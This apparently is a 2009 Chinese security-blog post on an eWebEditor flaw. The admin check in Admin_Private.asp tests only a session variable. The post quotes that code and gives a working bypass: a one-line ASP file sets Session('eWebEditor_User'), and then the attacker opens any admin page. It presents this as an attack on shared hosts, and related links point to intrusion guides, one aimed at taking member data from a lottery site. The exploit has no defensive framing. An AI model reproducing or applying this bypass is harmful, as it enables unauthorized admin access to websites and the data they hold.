专注于互联网--专注于架构

 最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » ewebeditor漏洞:eWebEditor  session欺骗漏洞 »正文

ewebeditor漏洞:eWebEditor  session欺骗漏洞

来源: 发布时间:星期六, 2009年9月12日 浏览:3次 评论:0
eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session没有判断cookies和路径验证问题
漏洞利用:
新建个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp再访问后台任何文件for example:Admin_Default.asp

漏洞影响:虚拟主机克星.



  • 篇文章: 收费资源我做主的手法(入侵)篇

  • 篇文章: 教你入侵 6合彩网拿会员料补充
    • 标签:ewebeditor漏洞总结 ewebeditorjsp漏洞 ewebeditor上传漏洞 ewebeditor漏洞
    0
    我顶

    相关文章

    读者评论

    发表评论

    • 昵称:
    • 内容:

    热门标签

    精华推荐

    最新标签

    Dig排行

    阅读排行

    最新文章